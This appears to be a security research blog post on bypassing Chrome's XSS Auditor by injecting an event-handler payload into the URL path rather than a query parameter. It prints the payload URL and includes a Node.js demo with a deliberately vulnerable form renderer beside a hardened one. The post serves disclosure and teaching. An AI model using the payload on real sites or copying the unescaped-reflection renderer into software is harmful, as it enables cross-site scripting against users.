Update: The bug has been reported to the Google Chrome team already. The details can be found here: https://code.google.com/p/chromium/issues/detail?id=330972. The team was not able to recreate the issue in the test environment. I validated this issue on the Command and Control (C&C) panel of a botnet :) and I was not in a position to reveal the details of that panel. Anyway, the bug is in WontFix state and Google Chrome is still vulnerable to these types of XSS bypasses.
Recently, I encountered an XSS Auditor bypass in Google Chrome (<= 32.0.1700.41 m Aura) while working on my research.
[Screenshot: Google Chrome latest version tested]
Consider a login page at http://www.example.com/index.php?m=login, which generates the form as follows:
For the injection, we crafted the URL as follows:
http://www.example.com/index.php/" onmouseover="JavaScript:alert(document.location)" name="?m=login
In this injection we have not injected into the "m" parameter; rather, we have played with the URI structure. The payload sits in the path after index.php, where the application reflects it into the form it generates. The idea is to tweak the form's layout rather than the value accepted by the "m" parameter: the leading " closes the attribute the path lands in, onmouseover=" becomes an attribute of the form element, and the trailing name=" absorbs the ?m=login that the application appends, so the markup stays well-formed. If you place the same injection in the "m" parameter, it gets nullified by the XSS Auditor. Let's see how the injection occurs:
As a result, the Google Chrome XSS Auditor is bypassed.
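To make the server-side reflection concrete, here is an added example written for this post (it is my own code, not the original post's and not the vulnerable application's). It is a Node.js script that reproduces the assumed pattern behind the bypass: the application builds the form's action attribute from the percent-decoded request path (the way PHP's $_SERVER['PHP_SELF'] or PATH_INFO would expose it) plus the "m" parameter, and writes both into a double-quoted attribute unescaped. It feeds that renderer the path-injection URL from the post and a constructed parameter-injection URL, tokenizes the resulting <form> start tag to show which names actually became attributes, and places a hardened renderer beside the vulnerable one. The form markup, the attribute names and the parameter-injection URL are assumptions; the post does not show the original form, and nothing here models why the auditor misses one variant and catches the other.

```javascript
// Added example, not code from the original post or from the tested application.
// ASSUMPTIONS: the application builds the <form> action from the percent-decoded
// request path (as PHP's $_SERVER['PHP_SELF'] or PATH_INFO would expose it) plus
// the "m" parameter, and writes both into a double-quoted attribute unescaped.
// The form markup below is invented for illustration.

// URL from the post: the payload lives in the path, not in the "m" parameter.
const PATH_INJECTION_URL =
  'http://www.example.com/index.php/" onmouseover="JavaScript:alert(document.location)" name="?m=login';

// Constructed for comparison: the same payload placed in the "m" parameter,
// which the post says the XSS Auditor catches.
const PARAM_INJECTION_URL =
  'http://www.example.com/index.php?m=login" onmouseover="JavaScript:alert(document.location)" name="';

// Approximation of how the server sees the request: the browser's URL parser
// percent-encodes the quotes and spaces, and the server decodes them again.
function serverView(requestUrl) {
  const u = new URL(requestUrl);
  return {
    phpSelf: decodeURIComponent(u.pathname), // e.g. '/index.php/" onmouseover=...'
    m: u.searchParams.get('m') || '',
  };
}

// Vulnerable renderer: reflects the request path and "m" into the action attribute.
function renderLoginFormVulnerable(requestUrl) {
  const { phpSelf, m } = serverView(requestUrl);
  return `<form method="post" action="${phpSelf}?m=${m}">` +
    '<input type="text" name="user"><input type="password" name="pass">' +
    '<input type="submit" value="Login"></form>';
}

// Minimal HTML attribute encoder; enough for a double-quoted attribute value.
function escapeAttr(value) {
  return String(value).replace(/[&<>"']/g, (c) => (
    { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]
  ));
}

// Hardened renderer: never reflects the request path (posts to a fixed endpoint)
// and attribute-encodes the one value it does reflect.
function renderLoginFormHardened(requestUrl) {
  const { m } = serverView(requestUrl);
  return `<form method="post" action="/index.php?m=${escapeAttr(m)}">` +
    '<input type="text" name="user"><input type="password" name="pass">' +
    '<input type="submit" value="Login"></form>';
}

// Tokenizes the attributes of the first <form> start tag the way a browser would,
// so we can see which names ended up as real attributes. A naive regex for
// "onmouseover=" would also match the encoded text inside a quoted value.
function formAttributeNames(html) {
  const start = html.indexOf('<form');
  if (start < 0) return [];
  const names = [];
  const isSpace = (c) => c === ' ' || c === '\t' || c === '\n' || c === '\r';
  let i = start + '<form'.length;
  while (i < html.length && html[i] !== '>') {
    while (i < html.length && isSpace(html[i])) i++;
    if (i >= html.length || html[i] === '>') break;
    let name = '';
    while (i < html.length && !isSpace(html[i]) && html[i] !== '=' && html[i] !== '>') {
      name += html[i++];
    }
    while (i < html.length && isSpace(html[i])) i++;
    if (html[i] === '=') {
      i++;
      while (i < html.length && isSpace(html[i])) i++;
      const quote = html[i];
      if (quote === '"' || quote === "'") {
        i++;
        while (i < html.length && html[i] !== quote) i++; // value ends at matching quote
        i++;
      } else {
        while (i < html.length && !isSpace(html[i]) && html[i] !== '>') i++;
      }
    }
    if (name) names.push(name.toLowerCase());
  }
  return names;
}

// True when the injected handler became an attribute of the form element.
function handlerInjected(html) {
  return formAttributeNames(html).includes('onmouseover');
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const [label, url] of [['path', PATH_INJECTION_URL], ['param', PARAM_INJECTION_URL]]) {
    console.log(`--- ${label} injection, vulnerable renderer ---`);
    console.log(renderLoginFormVulnerable(url));
    console.log(`--- ${label} injection, hardened renderer ---`);
    console.log(renderLoginFormHardened(url));
  }
}
```

Running it with `node` prints the four renderings. With the vulnerable renderer both URLs yield a form tag carrying method, action, onmouseover and name as separate attributes, which is the attribute break-out the post describes; the hardened renderer yields only method and action for both, because the path is never reflected and the reflected parameter is attribute-encoded. The difference between the two injection URLs is therefore not in what the server does but in what the client-side filter is willing to block, which is the point of the post.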
Inference: A few ideas that should be taken into consideration:
1. The design of the web application impacts the XSS Auditor: what the application reflects, and where, decides what the filter can match.
2. Instead of always targeting the HTTP parameters, also play with the URI structure (for example, extra path segments after the script name, as above).
Note: Internet Explorer blocked this vector.
Additional reading, for the inner workings of the Google Chrome XSS Auditor:
- XSS Auditor source code: https://code.google.com/p/webkit-mirror/source/browse/Source/WebCore/html/parser/XSSAuditor.cpp
- More about the XSS Auditor: http://www.collinjackson.com/research/xssauditor.pdf
Enjoy!